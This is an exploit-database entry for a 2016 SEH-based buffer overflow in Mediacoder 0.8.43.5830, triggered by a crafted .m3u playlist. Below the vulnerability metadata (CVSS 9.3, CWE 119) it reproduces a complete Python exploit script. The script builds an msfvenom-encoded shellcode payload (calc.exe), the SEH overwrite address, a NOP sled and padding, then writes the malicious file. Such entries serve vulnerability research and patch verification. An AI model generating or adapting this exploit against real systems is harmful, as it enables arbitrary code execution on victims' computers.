Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)

vendor:

Mediacoder

by:

Sibusiso Sishi

9,3

CVSS

HIGH

Buffer Overflow SEH Exploit

119

CWE

Product Name: Mediacoder

Affected Version From: 0.8.43.5830

Affected Version To: 0.8.43.5830

Patch Exists: YES

Related CWE: N/A

CPE: a:mediacoderhq:mediacoder:0.8.43.5830

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 EN

2016

Mediacoder 0.8.43.5830 – Buffer Overflow SEH Exploit (.m3u)

Mediacoder 0.8.43.5830 is vulnerable to a buffer overflow SEH exploit. The vulnerability is triggered when a specially crafted .m3u file is opened. The exploit uses a nop sled and shellcode to execute a calc.exe payload. The SEH handler is located at 0x64f03994 in swscale-3.dll.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python

# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
# Date: 25-June-2016
# Exploit Author: Sibusiso Sishi 
# Email: sibusiso [at] IronSky [dot] co.za
# Vendor Homepage: http://www.mediacoderhq.com/
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
# Version: 0.8.43.5830
# Tested on: Windows XP SP3 EN



#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")


seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
nop_sled = "\x90" * 14

buff = "http:// " 
buff += "A" * 776
buff += nseh
buff += seh
buff += nop_sled
buff += shellcode
buff += "D" * (4216 - (len(shellcode + nop_sled)))
fo = open("foo.m3u", "wb")
fo.write (buff)
fo.close()